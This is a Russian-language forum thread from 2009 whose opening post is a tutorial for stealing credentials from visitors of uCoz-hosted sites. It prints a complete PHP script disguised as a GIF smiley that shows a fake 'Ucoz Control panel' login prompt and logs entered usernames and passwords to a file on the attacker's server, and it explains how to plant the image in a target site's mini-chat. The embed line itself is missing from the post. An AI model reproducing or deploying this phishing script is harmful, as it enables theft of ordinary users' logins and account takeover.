[ | ]
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Форум » Ucoz » Учебник » Взлом сайта на UCOZ
Взлом сайта на UCOZ
SHAMJKEДата: Воскресенье, 03 Май 2009, 14:50 | Сообщение # 1
N1CE-game №1
Группа: Администраторы
Сообщений: 474
Замечания: ±
 
Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net ) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:

Code

<?   
header("Content-type: image/gif");   
$image = imagecreatefromgif('cool.gif');   
if(!$_COOKIE['LOGON'])   
{   
    $login = $_SERVER['PHP_AUTH_USER'];   
    $pass = $_SERVER['PHP_AUTH_PW'];   
if(strlen($pass) <= 4 || !$login)   
    {   
     Header('HTTP/1.1 401 Unauthorized');   
     Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');   
    }   
    elseif($login)   
    {   
setcookie('LOGON',md5($pass));   
$f = fopen('passwords.txt', 'ab');   
fwrite($f, $login." ||| ".$pass."\r\n");   
fclose($f);   
    }   
}   
imagegif($image);   
imagedestroy($image);   
?>

Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:


И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/ ) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.



Potfolio: shama DESIGN!
master-csДата: Пятница, 15 Май 2009, 15:43 | Сообщение # 2
noob
Группа: Пользователи
Сообщений: 6
Замечания: ±
 
Замени картинку после слов
Quote (Shamil)
напишите следующее:
Форум » Ucoz » Учебник » Взлом сайта на UCOZ
Страница 1 из 11
Поиск:

NORT © 2009-2010
Design by SHAMJKE and nOox